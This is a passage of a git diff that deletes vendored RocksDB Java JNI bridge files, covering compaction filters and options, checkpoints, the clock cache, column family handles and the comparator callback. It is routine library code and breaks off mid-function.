--- a/thirdparty/rocksdb/java/rocksjni/cassandra_compactionfilterjni.cc
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CassandraCompactionFilter.h"
-#include "utilities/cassandra/cassandra_compaction_filter.h"
-
-/*
- * Class:     org_rocksdb_CassandraCompactionFilter
- * Method:    createNewCassandraCompactionFilter0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CassandraCompactionFilter_createNewCassandraCompactionFilter0(
-    JNIEnv* env, jclass jcls, jboolean purge_ttl_on_expiration) {
-  auto* compaction_filter =
-      new rocksdb::cassandra::CassandraCompactionFilter(purge_ttl_on_expiration);
-  // set the native handle to our native compaction filter
-  return reinterpret_cast<jlong>(compaction_filter);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/cassandra_value_operator.cc b/thirdparty/rocksdb/java/rocksjni/cassandra_value_operator.cc
deleted file mode 100644
index aa58ecc..0000000
--- a/thirdparty/rocksdb/java/rocksjni/cassandra_value_operator.cc
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <memory>
-
-#include "include/org_rocksdb_CassandraValueMergeOperator.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/cassandra/merge_operator.h"
-
-/*
- * Class:     org_rocksdb_CassandraValueMergeOperator
- * Method:    newSharedCassandraValueMergeOperator
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CassandraValueMergeOperator_newSharedCassandraValueMergeOperator
-(JNIEnv* env, jclass jclazz) {
-  auto* sptr_string_append_op = new std::shared_ptr<rocksdb::MergeOperator>(
-    rocksdb::CassandraValueMergeOperator::CreateSharedInstance());
-  return reinterpret_cast<jlong>(sptr_string_append_op);
-}
-
-/*
- * Class:     org_rocksdb_CassandraValueMergeOperator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CassandraValueMergeOperator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_string_append_op =
-      reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>* >(jhandle);
-  delete sptr_string_append_op;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/checkpoint.cc b/thirdparty/rocksdb/java/rocksjni/checkpoint.cc
deleted file mode 100644
index 426f5d0..0000000
--- a/thirdparty/rocksdb/java/rocksjni/checkpoint.cc
+++ /dev/null
@@ -1,68 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Checkpoint methods from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_Checkpoint.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/checkpoint.h"
-/*
- * Class:     org_rocksdb_Checkpoint
- * Method:    newCheckpoint
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_Checkpoint_newCheckpoint(JNIEnv* env,
-    jclass jclazz, jlong jdb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  rocksdb::Checkpoint* checkpoint;
-  rocksdb::Checkpoint::Create(db, &checkpoint);
-  return reinterpret_cast<jlong>(checkpoint);
-}
-
-/*
- * Class:     org_rocksdb_Checkpoint
- * Method:    dispose
- * Signature: (J)V
- */
-void Java_org_rocksdb_Checkpoint_disposeInternal(JNIEnv* env, jobject jobj,
-    jlong jhandle) {
-  auto* checkpoint = reinterpret_cast<rocksdb::Checkpoint*>(jhandle);
-  assert(checkpoint != nullptr);
-  delete checkpoint;
-}
-
-/*
- * Class:     org_rocksdb_Checkpoint
- * Method:    createCheckpoint
- * Signature: (JLjava/lang/String;)V
- */
-void Java_org_rocksdb_Checkpoint_createCheckpoint(
-    JNIEnv* env, jobject jobj, jlong jcheckpoint_handle,
-    jstring jcheckpoint_path) {
-  const char* checkpoint_path = env->GetStringUTFChars(
-      jcheckpoint_path, 0);
-  if(checkpoint_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  auto* checkpoint = reinterpret_cast<rocksdb::Checkpoint*>(
-      jcheckpoint_handle);
-  rocksdb::Status s = checkpoint->CreateCheckpoint(
-      checkpoint_path);
-  
-  env->ReleaseStringUTFChars(jcheckpoint_path, checkpoint_path);
-  
-  if (!s.ok()) {
-      rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/clock_cache.cc b/thirdparty/rocksdb/java/rocksjni/clock_cache.cc
deleted file mode 100644
index 0a4d7b2..0000000
--- a/thirdparty/rocksdb/java/rocksjni/clock_cache.cc
+++ /dev/null
@@ -1,40 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::ClockCache.
-
-#include <jni.h>
-
-#include "cache/clock_cache.h"
-#include "include/org_rocksdb_ClockCache.h"
-
-/*
- * Class:     org_rocksdb_ClockCache
- * Method:    newClockCache
- * Signature: (JIZ)J
- */
-jlong Java_org_rocksdb_ClockCache_newClockCache(
-    JNIEnv* env, jclass jcls, jlong jcapacity, jint jnum_shard_bits,
-    jboolean jstrict_capacity_limit) {
-  auto* sptr_clock_cache =
-      new std::shared_ptr<rocksdb::Cache>(rocksdb::NewClockCache(
-          static_cast<size_t>(jcapacity),
-          static_cast<int>(jnum_shard_bits),
-          static_cast<bool>(jstrict_capacity_limit)));
-  return reinterpret_cast<jlong>(sptr_clock_cache);
-}
-
-/*
- * Class:     org_rocksdb_ClockCache
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ClockCache_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* sptr_clock_cache =
-      reinterpret_cast<std::shared_ptr<rocksdb::Cache> *>(jhandle);
-  delete sptr_clock_cache;  // delete std::shared_ptr
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/columnfamilyhandle.cc b/thirdparty/rocksdb/java/rocksjni/columnfamilyhandle.cc
deleted file mode 100644
index 6e40a7e..0000000
--- a/thirdparty/rocksdb/java/rocksjni/columnfamilyhandle.cc
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::Iterator methods from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-
-#include "include/org_rocksdb_ColumnFamilyHandle.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_ColumnFamilyHandle
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_ColumnFamilyHandle_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* cfh = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(handle);
-  assert(cfh != nullptr);
-  delete cfh;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/compaction_filter.cc b/thirdparty/rocksdb/java/rocksjni/compaction_filter.cc
deleted file mode 100644
index 72de46b..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compaction_filter.cc
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompactionFilter.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_AbstractCompactionFilter.h"
-#include "rocksdb/compaction_filter.h"
-
-// <editor-fold desc="org.rocksdb.AbstractCompactionFilter">
-
-/*
- * Class:     org_rocksdb_AbstractCompactionFilter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_AbstractCompactionFilter_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* cf = reinterpret_cast<rocksdb::CompactionFilter*>(handle);
-  assert(cf != nullptr);
-  delete cf;
-}
-// </editor-fold>
diff --git a/thirdparty/rocksdb/java/rocksjni/compaction_options_fifo.cc b/thirdparty/rocksdb/java/rocksjni/compaction_options_fifo.cc
deleted file mode 100644
index ef04d81..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compaction_options_fifo.cc
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompactionOptionsFIFO.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CompactionOptionsFIFO.h"
-#include "rocksdb/advanced_options.h"
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    newCompactionOptionsFIFO
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CompactionOptionsFIFO_newCompactionOptionsFIFO(
-    JNIEnv* env, jclass jcls) {
-  const auto* opt = new rocksdb::CompactionOptionsFIFO();
-  return reinterpret_cast<jlong>(opt);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    setMaxTableFilesSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_CompactionOptionsFIFO_setMaxTableFilesSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_table_files_size) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(jhandle);
-  opt->max_table_files_size = static_cast<uint64_t>(jmax_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    maxTableFilesSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_CompactionOptionsFIFO_maxTableFilesSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(jhandle);
-  return static_cast<jlong>(opt->max_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsFIFO
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CompactionOptionsFIFO_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  delete reinterpret_cast<rocksdb::CompactionOptionsFIFO*>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/compaction_options_universal.cc b/thirdparty/rocksdb/java/rocksjni/compaction_options_universal.cc
deleted file mode 100644
index d397db8..0000000
--- a/thirdparty/rocksdb/java/rocksjni/compaction_options_universal.cc
+++ /dev/null
@@ -1,194 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::CompactionOptionsUniversal.
-
-#include <jni.h>
-
-#include "include/org_rocksdb_CompactionOptionsUniversal.h"
-#include "rocksdb/advanced_options.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    newCompactionOptionsUniversal
- * Signature: ()J
- */
-jlong Java_org_rocksdb_CompactionOptionsUniversal_newCompactionOptionsUniversal(
-    JNIEnv* env, jclass jcls) {
-  const auto* opt = new rocksdb::CompactionOptionsUniversal();
-  return reinterpret_cast<jlong>(opt);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setSizeRatio
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jsize_ratio) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->size_ratio = static_cast<unsigned int>(jsize_ratio);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    sizeRatio
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_sizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->size_ratio);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setMinMergeWidth
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setMinMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmin_merge_width) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->min_merge_width = static_cast<unsigned int>(jmin_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    minMergeWidth
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_minMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->min_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setMaxMergeWidth
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setMaxMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_merge_width) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->max_merge_width = static_cast<unsigned int>(jmax_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    maxMergeWidth
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_maxMergeWidth(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->max_merge_width);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setMaxSizeAmplificationPercent
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setMaxSizeAmplificationPercent(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmax_size_amplification_percent) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->max_size_amplification_percent =
-      static_cast<unsigned int>(jmax_size_amplification_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    maxSizeAmplificationPercent
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_maxSizeAmplificationPercent(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->max_size_amplification_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setCompressionSizePercent
- * Signature: (JI)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setCompressionSizePercent(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jcompression_size_percent) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->compression_size_percent =
-      static_cast<unsigned int>(jcompression_size_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    compressionSizePercent
- * Signature: (J)I
- */
-jint Java_org_rocksdb_CompactionOptionsUniversal_compressionSizePercent(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return static_cast<jint>(opt->compression_size_percent);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setStopStyle
- * Signature: (JB)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setStopStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jstop_style_value) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->stop_style =
-      rocksdb::CompactionStopStyleJni::toCppCompactionStopStyle(
-          jstop_style_value); 
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    stopStyle
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_CompactionOptionsUniversal_stopStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return rocksdb::CompactionStopStyleJni::toJavaCompactionStopStyle(
-      opt->stop_style);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    setAllowTrivialMove
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_setAllowTrivialMove(
-    JNIEnv* env, jobject jobj, jlong jhandle, jboolean jallow_trivial_move) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  opt->allow_trivial_move = static_cast<bool>(jallow_trivial_move);
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    allowTrivialMove
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_CompactionOptionsUniversal_allowTrivialMove(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-  return opt->allow_trivial_move;
-}
-
-/*
- * Class:     org_rocksdb_CompactionOptionsUniversal
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_CompactionOptionsUniversal_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  delete reinterpret_cast<rocksdb::CompactionOptionsUniversal*>(jhandle);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/comparator.cc b/thirdparty/rocksdb/java/rocksjni/comparator.cc
deleted file mode 100644
index 5955d0b..0000000
--- a/thirdparty/rocksdb/java/rocksjni/comparator.cc
+++ /dev/null
@@ -1,68 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for
-// rocksdb::Comparator.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-#include <functional>
-
-#include "include/org_rocksdb_AbstractComparator.h"
-#include "include/org_rocksdb_Comparator.h"
-#include "include/org_rocksdb_DirectComparator.h"
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/portal.h"
-
-// <editor-fold desc="org.rocksdb.AbstractComparator>
-
-/*
- * Class:     org_rocksdb_AbstractComparator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_AbstractComparator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* bcjc = reinterpret_cast<rocksdb::BaseComparatorJniCallback*>(handle);
-  assert(bcjc != nullptr);
-  delete bcjc;
-}
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.Comparator>
-
-/*
- * Class:     org_rocksdb_Comparator
- * Method:    createNewComparator0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_Comparator_createNewComparator0(
-    JNIEnv* env, jobject jobj, jlong copt_handle) {
-  const rocksdb::ComparatorJniCallbackOptions* copt =
-    reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(copt_handle);
-  const rocksdb::ComparatorJniCallback* c =
-    new rocksdb::ComparatorJniCallback(env, jobj, copt);
-  return reinterpret_cast<jlong>(c);
-}
-// </editor-fold>
-
-// <editor-fold desc="org.rocksdb.DirectComparator>
-
-/*
- * Class:     org_rocksdb_DirectComparator
- * Method:    createNewDirectComparator0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_DirectComparator_createNewDirectComparator0(
-    JNIEnv* env, jobject jobj, jlong copt_handle) {
-  const rocksdb::ComparatorJniCallbackOptions* copt =
-    reinterpret_cast<rocksdb::ComparatorJniCallbackOptions*>(copt_handle);
-  const rocksdb::DirectComparatorJniCallback* c =
-    new rocksdb::DirectComparatorJniCallback(env, jobj, copt);
-  return reinterpret_cast<jlong>(c);
-}
-// </editor-fold>
diff --git a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.cc b/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.cc
deleted file mode 100644
index 73ab46a..0000000
--- a/thirdparty/rocksdb/java/rocksjni/comparatorjnicallback.cc
+++ /dev/null
@@ -1,366 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Comparator.
-
-#include "rocksjni/comparatorjnicallback.h"
-#include "rocksjni/portal.h"
-
-namespace rocksdb {
-BaseComparatorJniCallback::BaseComparatorJniCallback(
-    JNIEnv* env, jobject jComparator,
-    const ComparatorJniCallbackOptions* copt)
-    : mtx_compare(new port::Mutex(copt->use_adaptive_mutex)),
-    mtx_findShortestSeparator(new port::Mutex(copt->use_adaptive_mutex)) {
-  // Note: Comparator methods may be accessed by multiple threads,
-  // so we ref the jvm not the env
-  const jint rs = env->GetJavaVM(&m_jvm);
-  if(rs != JNI_OK) {
-    // exception thrown
-    return;
-  }
-
-  // Note: we want to access the Java Comparator instance
-  // across multiple method calls, so we create a global ref
-  assert(jComparator != nullptr);
-  m_jComparator = env->NewGlobalRef(jComparator);
-  if(m_jComparator == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  // Note: The name of a Comparator will not change during it's lifetime,
-  // so we cache it in a global var
-  jmethodID jNameMethodId = AbstractComparatorJni::getNameMethodId(env);
-  if(jNameMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-  jstring jsName = (jstring)env->CallObjectMethod(m_jComparator, jNameMethodId);
-  if(env->ExceptionCheck()) {
-    // exception thrown
-    return;
-  }
-  jboolean has_exception = JNI_FALSE;
-  m_name = JniUtil::copyString(env, jsName,
-      &has_exception);  // also releases jsName
-  if (has_exception == JNI_TRUE) {
-    // exception thrown
-    return;
-  }
-
-  m_jCompareMethodId = AbstractComparatorJni::getCompareMethodId(env);
-  if(m_jCompareMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-
-  m_jFindShortestSeparatorMethodId =
-    AbstractComparatorJni::getFindShortestSeparatorMethodId(env);
-  if(m_jFindShortestSeparatorMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-
-  m_jFindShortSuccessorMethodId =
-    AbstractComparatorJni::getFindShortSuccessorMethodId(env);
-  if(m_jFindShortSuccessorMethodId == nullptr) {
-    // exception thrown: NoSuchMethodException or OutOfMemoryError
-    return;
-  }
-}
-
-const char* BaseComparatorJniCallback::Name() const {
-  return m_name.c_str();
-}
-
-int BaseComparatorJniCallback::Compare(const Slice& a, const Slice& b) const {
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  // TODO(adamretter): slice objects can potentially be cached using thread
-  // local variables to avoid locking. Could make this configurable depending on
-  // performance.
-  mtx_compare->Lock();
-
-  bool pending_exception =
-      AbstractSliceJni::setHandle(env, m_jSliceA, &a, JNI_FALSE);
-  if(pending_exception) {
-    if(env->ExceptionCheck()) {
-      // exception thrown from setHandle or descendant
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return 0;
-  }
-
-  pending_exception =
-      AbstractSliceJni::setHandle(env, m_jSliceB, &b, JNI_FALSE);
-  if(pending_exception) {
-    if(env->ExceptionCheck()) {
-      // exception thrown from setHandle or descendant
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return 0;
-  }
-  
-  jint result =
-    env->CallIntMethod(m_jComparator, m_jCompareMethodId, m_jSliceA,
-      m_jSliceB);
-
-  mtx_compare->Unlock();
-
-  if(env->ExceptionCheck()) {
-    // exception thrown from CallIntMethod
-    env->ExceptionDescribe(); // print out exception to stderr
-    result = 0; // we could not get a result from java callback so use 0
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-
-  return result;
-}
-
-void BaseComparatorJniCallback::FindShortestSeparator(
-  std::string* start, const Slice& limit) const {
-  if (start == nullptr) {
-    return;
-  }
-
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  const char* startUtf = start->c_str();
-  jstring jsStart = env->NewStringUTF(startUtf);
-  if(jsStart == nullptr) {
-    // unable to construct string
-    if(env->ExceptionCheck()) {
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-  if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    env->ExceptionDescribe(); // print out exception to stderr
-    env->DeleteLocalRef(jsStart);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  // TODO(adamretter): slice object can potentially be cached using thread local
-  // variable to avoid locking. Could make this configurable depending on
-  // performance.
-  mtx_findShortestSeparator->Lock();
-
-  bool pending_exception =
-      AbstractSliceJni::setHandle(env, m_jSliceLimit, &limit, JNI_FALSE);
-  if(pending_exception) {
-    if(env->ExceptionCheck()) {
-      // exception thrown from setHandle or descendant
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    if(jsStart != nullptr) {
-      env->DeleteLocalRef(jsStart);
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  jstring jsResultStart =
-    (jstring)env->CallObjectMethod(m_jComparator,
-      m_jFindShortestSeparatorMethodId, jsStart, m_jSliceLimit);
-
-  mtx_findShortestSeparator->Unlock();
-
-  if(env->ExceptionCheck()) {
-    // exception thrown from CallObjectMethod
-    env->ExceptionDescribe();  // print out exception to stderr
-    env->DeleteLocalRef(jsStart);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  env->DeleteLocalRef(jsStart);
-
-  if (jsResultStart != nullptr) {
-    // update start with result
-    jboolean has_exception = JNI_FALSE;
-    std::string result = JniUtil::copyString(env, jsResultStart,
-        &has_exception);  // also releases jsResultStart
-    if (has_exception == JNI_TRUE) {
-      if (env->ExceptionCheck()) {
-        env->ExceptionDescribe();  // print out exception to stderr
-      }
-      JniUtil::releaseJniEnv(m_jvm, attached_thread);
-      return;
-    }
-
-    *start = result;
-  }
-
-  JniUtil::releaseJniEnv(m_jvm, attached_thread);
-}
-
-void BaseComparatorJniCallback::FindShortSuccessor(std::string* key) const {
-  if (key == nullptr) {
-    return;
-  }
-
-  jboolean attached_thread = JNI_FALSE;
-  JNIEnv* env = JniUtil::getJniEnv(m_jvm, &attached_thread);
-  assert(env != nullptr);
-
-  const char* keyUtf = key->c_str();
-  jstring jsKey = env->NewStringUTF(keyUtf);
-  if(jsKey == nullptr) {
-    // unable to construct string
-    if(env->ExceptionCheck()) {
-      env->ExceptionDescribe(); // print out exception to stderr
-    }
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  } else if(env->ExceptionCheck()) {
-    // exception thrown: OutOfMemoryError
-    env->ExceptionDescribe(); // print out exception to stderr
-    env->DeleteLocalRef(jsKey);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  jstring jsResultKey =
-    (jstring)env->CallObjectMethod(m_jComparator,
-      m_jFindShortSuccessorMethodId, jsKey);
-
-  if(env->ExceptionCheck()) {
-    // exception thrown from CallObjectMethod
-    env->ExceptionDescribe(); // print out exception to stderr
-    env->DeleteLocalRef(jsKey);
-    JniUtil::releaseJniEnv(m_jvm, attached_thread);
-    return;
-  }
-
-  env->DeleteLocalRef(jsKey);
-
-  if (jsResultKey != nullptr) {
-    // updates key with result, also releases jsResultKey.
-    jboolean has_exception = JNI_FALSE;
-    std::string result = JniUtil::copyString(env, jsResultKey, &has_exception);
-    if (has_exception == JNI_TRUE) {
-      if (env->ExceptionCheck()) {
-        env->ExceptionDescribe();  // print out exception to stderr
-      }
